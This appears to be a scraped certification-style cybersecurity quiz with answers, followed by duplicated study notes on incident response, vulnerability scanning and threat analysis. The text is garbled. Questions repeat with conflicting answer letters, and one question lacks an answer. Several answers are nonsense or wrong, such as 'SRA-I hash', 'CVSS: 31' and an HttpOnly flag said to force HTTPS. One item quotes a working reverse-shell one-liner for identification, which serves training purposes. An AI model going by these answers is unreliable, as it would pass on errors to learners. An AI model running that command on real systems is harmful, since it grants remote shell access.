Cybersecurity Vulnerability Assessment Quiz

Questions and Answers

Which of the following is the best way to begin preparation for a report titled 'What We Learned' regarding a recent incident involving a cybersecurity breach?

• Determine the sophistication of the audience that the report is meant for (correct)
• Decide on the color scheme that will effectively communicate the metrics
• Include a table of contents outlining the entire report
• Include references and sources of information on the first page

Which of the following actions would allow the analyst to gather intelligence without disclosing information to the attackers?

• Execute the binaries on an environment with internet connectivity
• Query the file hashes using VirusTotal
• Upload the binary to an air-gapped sandbox for analysis (correct)
• Send the binaries to the antivirus vendor

Which of the following would help to minimize human engagement and aid in process improvement in security operations?

• QVVASP
• OSSTMM
• SIEM
• SOAR (correct)

Which of the following risk management principles did the CISO select when refusing the software request due to high risk?

Avoid (A)

Which of the following is an important aspect that should be included in the lessons-learned step after an incident?

Identify any improvements or changes in the incident response plan or procedures (D)

Which of the following will best achieve the goal of consolidating several threat intelligence feeds?

Single pane of glass (D)

Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?

MITRE ATT&CK (B)

An analyst is remediating items associated with a recent incident. Which step of the process does isolating the vulnerability and removing it from the system describe?

Eradication (A)

What is the best action for the incident response team to recommend regarding Joe's actions on social media?

Perform no action until HR or legal counsel advises on next steps (C)

Which of the following is the best priority for a program to reduce attack surface risks and threats as part of a zero-trust approach?

Reduce the administrator and privileged access accounts (B)

After a security incident during a holiday break, which action should the analyst take first to find out what happened?

Clone the virtual server for forensic analysis (B)

What is the most likely explanation for unusual outgoing HTTPS connections from a data center server?

C2 beaconing activity (E)

What will the SOC manager most likely recommend to help ensure new employees are accountable for following the company policy regarding personal devices?

All new employees must sign a user agreement to acknowledge the company security policy (D)

Which of the following would be the best threat intelligence source for validating the potential risk of a new ransomware campaign?

Information sharing organization (D)

Why is it important to include lessons learned in an after-action report?

To identify areas of improvement in the incident response process (D)

Given a third-party scoring system, which vulnerabilities should be patched first based on urgency?

TSpirit: Cobain: Yes, Grohl: Yes, Novo: Yes, Smear: No, Channing: No (A)

What role has the user taken by downloading malware that infected other systems?

Insider threat (C)

What should the CSIRT conduct next after isolating a compromised virtual server?

Take a snapshot of the compromised server and verify its integrity (A)

Which must be collected first in a computer system to ensure proper evidence acquisition during an incident?

Running processes (C)

Which shell script function could help a security analyst identify possible network addresses from different source networks?

function z() { c=$(geoiplookup $1) && echo '$1 | $c' } (C)

Which function would help a security analyst identify IP addresses from the same country?

function x() { info=$(geoiplookup $1) && echo '$1 | $info' } (A)

Given findings from a vulnerability assessment, which should be completed first to remediate?

Perform proper sanitization on all fields (A)

What vulnerability is indicated by a command output that lacks input validation?

Lack of input validation (D)

What best practices should a company follow regarding a proxy with unpatched vulnerabilities?

Decommission the proxy (A)

Which log entry provides evidence of an attempted exploit concerning a zero-day command injection vulnerability?

Log entry 2 (C)

What is the most important factor to ensure accurate incident response reporting?

A well-defined timeline of the events (A)

What is the best mitigation technique for unusual network scanning activity coming from a foreign country?

Geoblock the offending source country (C)

What is the best step to preserve evidence regarding an employee suspected of laptop misuse?

Make a forensic image of the device and create a SRA-I hash (C)

Which vulnerabilities should a security analyst prioritize for remediation based on the provided information?

rogers (B)

Which vulnerability type is the security analyst validating in a web application vulnerability scan?

XSS (B)

What immediate action should be performed during a cybersecurity incident involving ransomware on a web server?

Quarantine the server (A)

What would likely be missing from a vulnerability scan performed with a newly configured scanner appliance?

Registry key values (C)

Which method should be used to resolve incomplete findings in vulnerability reports?

Credentialed scan (A)

What best describes the activity when observing consistent requests to a blocklisted external server from an internal host?

Data exfiltration (C)

What does the output from a network mapping tool for a PCI audit best describe?

The host is allowing insecure cipher suites (B)

Which of the following CVE metrics would be most accurate for a recent zero-day vulnerability that is being actively exploited?

CVSS: 31/AV: N/AC: L/PR: N/UI: N/S: U/C: H/I: H/A: L (A)

Which of the following tools would work best to prevent the exposure of PII outside of an organization?

DLP (C)

Which of the following tuning recommendations should the security analyst share after a web application vulnerability assessment?

Block requests without an X-Frame-Options header (A), Set an HttpOnly flag to force communication by HTTPS (B), Configure an Access-Control-Allow-Origin header to authorized domains (C)

Which of the following items should be included in a vulnerability scan report? (Choose two)

Affected hosts (A), Risk score (F)

What would best protect an organization from exploitation of new attacks occurring 45 days after a patch release?

A mean time to remediate of 30 days (D)

Given the following script, which scripting language was used?

PowerShell (D)

Which of the following most likely describes the observed activity of compromised user accounts with inconsistent portal access?

An on-path attack is being performed that forces users into port 80 (C)

Which of the following items should be included in a vulnerability scan report? (Choose two)

Affected hosts (A), Risk score (E)

Which of the following will most likely ensure that mission-critical services are available in the event of an incident?

Business continuity plan (D)

Which of the following solutions will assist in reducing the risk of shadow IT in the enterprise?

Deploy a CASB and enable policy enforcement (C)

Which logs should the incident response team review first after a DDoS attack on external SaaS resources?

DNS (C)

Which of the following best describes the current stage of the Cyber Kill Chain that the malicious actor is operating in?

Exploitation (B)

Which of the following steps of an attack framework is the analyst witnessing when an external IP is running scans across assets?

Reconnaissance (B)

Which of the following best describes a targeted email with concealed URLs aimed at administrators?

Social engineering attack (B)

Which of the following recommendations would best mitigate vulnerabilities regularly found in a critical application?

Use application security scanning as part of the pipeline for the CI/CD flow (A)

Which inhibitors to remediation do the critical systems that cannot be upgraded represent?

Proprietary systems (D)

Which of the following most accurately describes the result of a web server scan for XSS vulnerabilities?

The vulnerable parameter and unfiltered or encoded characters passed '>' and '"' as unsafe (B)

Which of the following is the best action after a security incident to improve incident response in the future?

Schedule a review with all teams to discuss what occurred (A)

Which technique is best for analyzing a malicious binary file?

Reverse engineering (C)

Which piece of data should be collected first to preserve sensitive information before isolating a compromised server?

Hard disk (B)

Which of the following security operations tasks are ideal for automation?

Email header analysis: Check email headers for phishing metrics and add domains to block list. (B), Firewall IoC block actions: Examine firewall logs for IoCs and block behavior. (D)

Under PCI DSS, which group should an organization report a breach of customer transactions to?

PCI Security Standards Council (A)

Which metric should an organization focus on after recent investments in SIEM, SOAR, and a ticketing system?

Mean time to detect (D)

Which of the following implications should be considered when transitioning to a hybrid IaaS cloud environment?

Cloud-specific misconfigurations may not be detected by current scanners (C)

What is the best way to ensure a compliance investigation adheres to HR or privacy policies?

Ensure case details do not reflect user-identifiable information and password protect evidence (C)

Which of the following is the first step that should be performed when establishing a disaster recovery plan?

Agree on the goals and objectives of the plan (B)

Which should be the next step after applying a software patch to a server vulnerability?

Validation (C)

What has occurred if an analyst reviews an endpoint log entry?

New account introduced (B)

What best describes a security program achieving a 30% improvement in MTTR?

Single pane of glass (C)

Which choice should the analyst look at first during a network discovery based on Nmap scan results?

wh4dc-748gy.lan (192.168.86.152) (E)

When starting an investigation, what must be done first?

Secure the scene (D)

How should a CSIRT lead determine communication during a security incident?

Review documentation in the incident response policy or plan (B)

Which of the following will produce data needed for an executive briefing on possible threats?

Risk assessment (D)

Which describes an internal device sending HTTPS traffic to a known malicious IP?

Beaconing (D)

What can an analyst perform to see the entire contents of downloaded files in Wireshark?

Change the display filter to ftp-data and follow the TCP streams (C)

Which document should the SOC manager review to ensure the team's obligations are met after a customer vulnerability report?

SLA (B)

Which phase of the Cyber Kill Chain involves the adversary attempting to establish communication with a target?

Command and control (A)

Which vulnerability scanning method would best reduce network traffic for a company with a diverse workforce?

Agent-based (A)

Which shell script function is used to identify anomalies in network routing most accurately?

Which of the following is the best way to begin preparation for a report titled 'What We Learned' regarding a recent incident involving a cybersecurity breach?

Determine the sophistication of the audience that the report is meant for (D)

Which action would allow a security analyst to gather intelligence without disclosing information to attackers?

Upload the binary to an air-gapped sandbox for analysis (B)

Which of the following would help to minimize human engagement and aid in process improvement in security operations?

SOAR (A)

Which risk management principle did the Chief Information Security Officer select when refusing a software request due to high risk?

Avoid (B)

Which aspect should be included in the lessons-learned step after an incident?

Identify any improvements or changes in the incident response plan or procedures (D)

What will best achieve the goal of consolidating several threat intelligence feeds and maximizing results?

Single pane of glass (C)

Which tool would a security analyst most likely use to compare TTPs between different known adversaries?

MITRE ATT&CK (D)

What step does isolating and removing a vulnerability describe?

Eradication (B)

Which action should the incident response team recommend regarding Joe, who is soliciting customers online?

Perform no action until HR or legal counsel advises on next steps (A)

What is the best priority for the program directed by the Chief Information Security Officer to reduce attack surface risks?

Reduce the administrator and privileged access accounts (A)

Which action should an analyst take first to find out precisely what happened in a security incident?

Clone the virtual server for forensic analysis (A)

What is the most likely explanation for regular outgoing HTTPS connections from a server after hours?

C2 beaconing activity (D)

Which most likely provides evidence that new employees are not aware of the company policy prohibiting personal devices?

All new employees must sign a user agreement to acknowledge the company security policy (C)

What would be the best threat intelligence source to learn about a new ransomware campaign?

Information sharing organization (C)

What is the most likely reason to include lessons learned in an after-action report?

To identify areas of improvement in the incident response process (D)

Which vulnerabilities should the vulnerability management team patch first?

TSpirit: Cobain: Yes, Grohl: Yes, Novo: Yes, Smear: No, Channing: No (A)

What type of threat has the user become after downloading malware?

Insider threat (C)

Which action should the CSIRT conduct after isolating a compromised server?

Take a snapshot of the compromised server and verify its integrity (A)

Which evidence must be collected first in a computer system during an incident according to volatility?

Running processes (C)

Which shell script function could help identify possible network addresses from different source networks?

function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F '.in-addr' '{print $1}').origin.asn.cymru.com TXT +short } (D)

Which shell script function would help identify IP addresses from the same country?

function x() { info=$(geoiplookup $1) && echo "$1 | $info" } (C)

What should be completed first to remediate findings from a web server vulnerability assessment?

Perform proper sanitization on all fields (C)

What is the most likely vulnerability identified from debugger output for a client-server application?

Lack of input validation (C)

Which best practice should the company follow with a proxy that has unpatched vulnerabilities and is no longer in use?

Decommission the proxy (B)

Which log entry provides evidence of a zero-day command injection vulnerability being exploited?

Log entry 1 (C)

What is the most important factor to ensure accurate incident response reporting?

A well-defined timeline of the events (B)

What is the best mitigation technique for unusual network scanning activity from a non-business-related country?

Geoblock the offending source country (B)

What is the best step to preserve evidence when an employee is suspected of misusing a company-issued laptop?

Make a forensic image of the device and create a SRA-I hash (A)

Which should the security analyst prioritize for remediation based on the vulnerability information shown?

brady (D)

What type of vulnerability is the security analyst validating with the provided snippet?

XSS (C)

What action should be performed immediately after a web server at the perimeter network is affected by ransomware?

Quarantine the server (D)

Which information would be missing from a vulnerability scan configured without credentialing?

Registry key values (A)

What method should be used to resolve incomplete findings in vulnerability reports?

Credentialed scan (D)

What best describes the activity observed from an internal host to a blocklisted external server in SIEM logs?

Data exfiltration (B)

What best describes the output analyzed during a PCI audit?

The host is allowing insecure cipher suites (C)

Which of the following CVE metrics would be most accurate for a recent zero-day vulnerability that is being actively exploited?

CVSS: 31/AV: N/AC: L/PR: N/UI: N/S: U/C: H/I: H/A: L (D)

Which of the following tools would work best to prevent the exposure of PII outside of an organization?

DLP (C)

Which of the following tuning recommendations should a security analyst share after a web application vulnerability assessment?

Configure an Access-Control-Allow-Origin header to authorized domains (A), Set an HttpOnly flag to force communication by HTTPS (B)

Which of the following items should be included in a vulnerability scan report? (Choose two)

Risk score (B), Affected hosts (C)

Which of the following would best protect an organization from new attacks occurring approximately 45 days after a patch is released?

A mean time to remediate of 30 days (D)

Given a script, which of the following scripting languages was used?

PowerShell (D)

Which of the following best describes the activity of a compromised internal portal accessible through both HTTP and HTTPS?

An on-path attack is being performed by someone with internal access that forces users into port 80 (D)

Which of the following will most likely ensure that mission-critical services are available in the event of an incident?

Business continuity plan (C)

Which solution will assist in reducing shadow IT in the enterprise?

Deploy a CASB and enable policy enforcement (D)

Which logs should the incident response team review first after a DDoS attack?

DNS (C)

Which stage of the Cyber Kill Chain is best described for a malicious actor gaining access to an internal network through social engineering?

Exploitation (C)

Which step of an attack framework is an analyst witnessing when they find an external IP running scans?

Reconnaissance (C)

What best describes the activity when emails are sent targeting company administrators with concealed URLs?

Social engineering attack (D)

Which recommendation would best mitigate ongoing vulnerability findings if applied along the SDLC phase?

Use application security scanning as part of the pipeline for the CI/CD flow (A)

Which inhibitors to remediation are represented by systems that cannot be upgraded due to access issues?

Proprietary systems (D)

What best describes the result of an XSS vulnerability scan?

The vulnerable parameter and characters '>' and '"' with a reflected XSS attempt (C)

What is the best action to take after a security incident to improve future responses?

Schedule a review with all teams to discuss what occurred (C)

What is the best technique for analyzing a malicious binary file?

Reverse engineering (A)

What should be collected first to preserve sensitive information before isolating a critical server?

Hard disk (E)

Which security operations task is ideal for automation?

Email header analysis: Check the email header for a phishing confidence metric. (C), Firewall IoC block actions: Examine the firewall logs for IoCs. (D)

Under PCI DSS, which group should an organization report a breach of customer transactions to?

PCI Security Standards Council (B)

Which is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?

Mean time to detect (A)

Which implication should be considered when moving a vulnerability management program to a hybrid cloud environment?

Cloud-specific misconfigurations may not be detected by the current scanners (D)

What is the best way to ensure compliance with HR or privacy policies during an investigation of a user?

Ensure that case details do not reflect any user-identifiable information (C)

What is the first step that should be performed when establishing a disaster recovery plan?

Agree on the goals and objectives of the plan (A)

What should be the next step after applying a software patch to a server?

Validation (B)

What does an endpoint log entry indicating a certain occurrence likely suggest?

Privilege escalation (B)

What best describes a security program that saw improvement in MTTR by using integrated controls in SIEM?

Single pane of glass (A)

Which device should a security analyst look at first when performing a network discovery?

wh4dc-748gy.lan (192.168.86.152) (A)

Which action must be performed first when starting an investigation?

Secure the scene (A)

How should a CSIRT lead determine communication during a security incident?

The lead should review what is documented in the incident response policy or plan (A)

Which source will produce data needed for an executive briefing on possible threats?

Indicators of compromise (D)

What indicates that an internal device is sending HTTPS traffic to a known-malicious IP?

Beaconing (D)

What should a security analyst do to see the full contents of downloaded files from an FTP session?

Change the display filter to ftp-data and follow the TCP streams (A)

Which document should a SOC manager review to ensure team meets contractual obligations after a client received a vulnerability report?

SLA (A)

What phase of the Cyber Kill Chain involves establishing communication with a successfully exploited target?

Command and control (B)

What vulnerability scanning method can reduce network traffic for a geographically diverse workforce?

Agent-based (D)

What is being attempted with the command 'sh -i >& /dev/udp/10.1.1.1/4821 0>&1'?

Reverse shell (D)

What would likely be communicated as the reason for elevating a CVE score from 7.1 to 9.8?

Weaponization (B)

Which system should be prioritized for patching based on a vulnerability report?

54.74.110.228 (D)

What scanning method can reduce access while providing accurate vulnerability scan results?

Passive scanning (A)

What shell script function can an analyst use to identify routing anomalies?

function x() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info" } (D)

Which security control would best support a company against sensitive information disclosure via file sharing?

Data loss prevention solutions (A)

Study Notes

Vulnerability Management & Security Metrics

• Recent zero-day vulnerabilities are exploited without user interaction and have high confidentiality and integrity impact, suggesting immediate patching is necessary.
• CVE metrics for zero-day threats involve assessing Exploitability, Access Complexity, and the need for user interaction.
• Vulnerability scan reports should include affected hosts and risk scores to prioritize remediation efforts.

Tools & Strategies to Protect Sensitive Data

• Data Loss Prevention (DLP) tools effectively prevent exposure of Personally Identifiable Information (PII) outside an organization.
• Implementing a CASB (Cloud Access Security Broker) helps reduce shadow IT and manage risks associated with unauthorized cloud applications.

Incident Response & Investigation

• Identify the security incident’s cause through logs like CDN, DNS, or web server entries in case of a DDoS attack.
• The Cyber Kill Chain’s stages, such as exploitation and command and control, help understand the attacker's strategy in infiltration scenarios.
• Critical actions post-incident include reviewing processes and capturing data such as the primary boot partition for evidence preservation.

Security Policies & Compliance

• Organizations must report breaches under PCI DSS to the PCI Security Standards Council and relevant law enforcement bodies.
• Security operations should be underpinned by service-level agreements (SLAs) to ensure timely response and contractual obligations are met.

Vulnerability Scanning Techniques

• Agent-based scanning is preferred in hybrid environments to reduce network traffic and improve scanning efficiency.
• Credentialed scanning offers more accurate results while accessing sensitive systems with minimal exposure.

Risk Management & Decision Making

• Risk management principles include avoiding high-risk software deployments where necessary.
• The decision-making process during security incidents often refers to established policies for effective communication and actions required.

Human Engagement & Process Improvement

• Security tools like SOAR (Security Orchestration, Automation, and Response) minimize manual engagement, enabling quicker and more efficient responses.
• Continuous training and awareness for employees improve the organization’s security posture against data leaks.

Analyzing Malicious Activity

• Reverse shell attempts and other exploit mechanisms require meticulous analysis of endpoint logs to detect potential breaches.
• Use proper scanning and analysis techniques to understand traffic anomalies, enhance security posture, and identify vulnerabilities early.

Lessons Learned from Incidents

• Post-incident reviews are crucial for improving defenses, involving multi-team discussions to analyze what transpired and how processes can be enhanced.
• Relevant documentation of the incident can serve as valuable training material moving forward to prevent similar occurrences.### Incident Response and Security Measures
• Incident response plans must be updated after incidents, analyzing if internal mistakes occurred and who was responsible.
• Legal evidence gathered during incidents should be presented to law enforcement to assist investigations.
• Financial evaluations of incidents help determine the effectiveness of security controls in place.

Threat Intelligence and Analysis

• Consolidating threat intelligence feeds can be achieved using a "single pane of glass," which provides a unified view.
• Security analysts often use frameworks like MITRE ATT&CK to compare tactics, techniques, and procedures (TTPs) of known adversaries.
• Understanding potential risks from new threats requires consulting specialized threat intelligence sources, particularly for critical infrastructure, such as aerospace manufacturing.

Incident Management and Remediation

• The process of isolating and removing vulnerabilities is identified as "eradication."
• Best practices for employee incidents include consulting HR or legal before taking action against employees suspected of wrongdoing.
• A zero-trust approach emphasizes reducing privileged accounts to minimize attack surfaces.

Forensic Analysis and Evidence Collection

• In incident response, evidence collection must prioritize volatile data, starting with running processes before stabilizing disk contents.
• For compromised systems, taking snapshots for forensic purposes should be conducted post-isolation from the network.

Vulnerability Management

• High CVE scores (e.g., 9.8) signal urgent vulnerabilities needing immediate action; often best to decommission unused systems to prevent risk.
• Credentialed scans improve the comprehensiveness of vulnerability assessments, capturing what external scans miss.

Security Best Practices

• Employees should formally acknowledge security policies to prevent policy violations, such as using unauthorized devices.
• Geoblocking or blocking specific IP addresses is an effective mitigation for suspicious scanning activities emanating from regions without business relations.
• During a ransomware attack, quick actions include quarantining the affected server to limit the spread of the malware.

Analyzing Security Incidents

• SIEM logs revealing consistent internal requests to a blocklisted server can indicate data exfiltration or rogue device activity.
• Vulnerability scanning that is improperly configured may miss important aspects, such as operating system versions or open ports.

Miscellaneous

• Logs indicating potential vulnerabilities like command injection should be thoroughly analyzed to gauge susceptibility.
• In cases of employee misconduct, a forensic image of devices is critical for preserving evidence during investigations.

Technical Considerations

• Script functions can aid analysts in identifying IP addresses and network behaviors, enhancing threat response and network monitoring.
• Analysts must prioritize vulnerabilities based on potential exploitation, directing remediation efforts where they are most critical.

This expansive view covers essential themes regarding incident response, threat analysis, vulnerability management, and general security practices.

Vulnerability Management & Security Metrics

• Recent zero-day vulnerabilities are exploited without user interaction and have high confidentiality and integrity impact, suggesting immediate patching is necessary.
• CVE metrics for zero-day threats involve assessing Exploitability, Access Complexity, and the need for user interaction.
• Vulnerability scan reports should include affected hosts and risk scores to prioritize remediation efforts.

Tools & Strategies to Protect Sensitive Data

• Data Loss Prevention (DLP) tools effectively prevent exposure of Personally Identifiable Information (PII) outside an organization.
• Implementing a CASB (Cloud Access Security Broker) helps reduce shadow IT and manage risks associated with unauthorized cloud applications.

Incident Response & Investigation

• Identify the security incident’s cause through logs like CDN, DNS, or web server entries in case of a DDoS attack.
• The Cyber Kill Chain’s stages, such as exploitation and command and control, help understand the attacker's strategy in infiltration scenarios.
• Critical actions post-incident include reviewing processes and capturing data such as the primary boot partition for evidence preservation.

Security Policies & Compliance

• Organizations must report breaches under PCI DSS to the PCI Security Standards Council and relevant law enforcement bodies.
• Security operations should be underpinned by service-level agreements (SLAs) to ensure timely response and contractual obligations are met.

Vulnerability Scanning Techniques

• Agent-based scanning is preferred in hybrid environments to reduce network traffic and improve scanning efficiency.
• Credentialed scanning offers more accurate results while accessing sensitive systems with minimal exposure.

Risk Management & Decision Making

• Risk management principles include avoiding high-risk software deployments where necessary.
• The decision-making process during security incidents often refers to established policies for effective communication and actions required.

Human Engagement & Process Improvement

• Security tools like SOAR (Security Orchestration, Automation, and Response) minimize manual engagement, enabling quicker and more efficient responses.
• Continuous training and awareness for employees improve the organization’s security posture against data leaks.

Analyzing Malicious Activity

• Reverse shell attempts and other exploit mechanisms require meticulous analysis of endpoint logs to detect potential breaches.
• Use proper scanning and analysis techniques to understand traffic anomalies, enhance security posture, and identify vulnerabilities early.

Lessons Learned from Incidents

• Post-incident reviews are crucial for improving defenses, involving multi-team discussions to analyze what transpired and how processes can be enhanced.
• Relevant documentation of the incident can serve as valuable training material moving forward to prevent similar occurrences.### Incident Response and Security Measures
• Incident response plans must be updated after incidents, analyzing if internal mistakes occurred and who was responsible.
• Legal evidence gathered during incidents should be presented to law enforcement to assist investigations.
• Financial evaluations of incidents help determine the effectiveness of security controls in place.

Threat Intelligence and Analysis

• Consolidating threat intelligence feeds can be achieved using a "single pane of glass," which provides a unified view.
• Security analysts often use frameworks like MITRE ATT&CK to compare tactics, techniques, and procedures (TTPs) of known adversaries.
• Understanding potential risks from new threats requires consulting specialized threat intelligence sources, particularly for critical infrastructure, such as aerospace manufacturing.

Incident Management and Remediation

• The process of isolating and removing vulnerabilities is identified as "eradication."
• Best practices for employee incidents include consulting HR or legal before taking action against employees suspected of wrongdoing.
• A zero-trust approach emphasizes reducing privileged accounts to minimize attack surfaces.

Forensic Analysis and Evidence Collection

• In incident response, evidence collection must prioritize volatile data, starting with running processes before stabilizing disk contents.
• For compromised systems, taking snapshots for forensic purposes should be conducted post-isolation from the network.

Vulnerability Management

• High CVE scores (e.g., 9.8) signal urgent vulnerabilities needing immediate action; often best to decommission unused systems to prevent risk.
• Credentialed scans improve the comprehensiveness of vulnerability assessments, capturing what external scans miss.

Security Best Practices

• Employees should formally acknowledge security policies to prevent policy violations, such as using unauthorized devices.
• Geoblocking or blocking specific IP addresses is an effective mitigation for suspicious scanning activities emanating from regions without business relations.
• During a ransomware attack, quick actions include quarantining the affected server to limit the spread of the malware.

Analyzing Security Incidents

• SIEM logs revealing consistent internal requests to a blocklisted server can indicate data exfiltration or rogue device activity.
• Vulnerability scanning that is improperly configured may miss important aspects, such as operating system versions or open ports.

Miscellaneous

• Logs indicating potential vulnerabilities like command injection should be thoroughly analyzed to gauge susceptibility.
• In cases of employee misconduct, a forensic image of devices is critical for preserving evidence during investigations.

Technical Considerations

• Script functions can aid analysts in identifying IP addresses and network behaviors, enhancing threat response and network monitoring.
• Analysts must prioritize vulnerabilities based on potential exploitation, directing remediation efforts where they are most critical.

This expansive view covers essential themes regarding incident response, threat analysis, vulnerability management, and general security practices.

Description

Test your knowledge on identifying CVE metrics for zero-day vulnerabilities. This quiz focuses on the characteristics of a specific zero-day threat and requires an understanding of Common Vulnerability Scoring System (CVSS) metrics. Assess your skills in evaluating the impact of vulnerabilities on network security.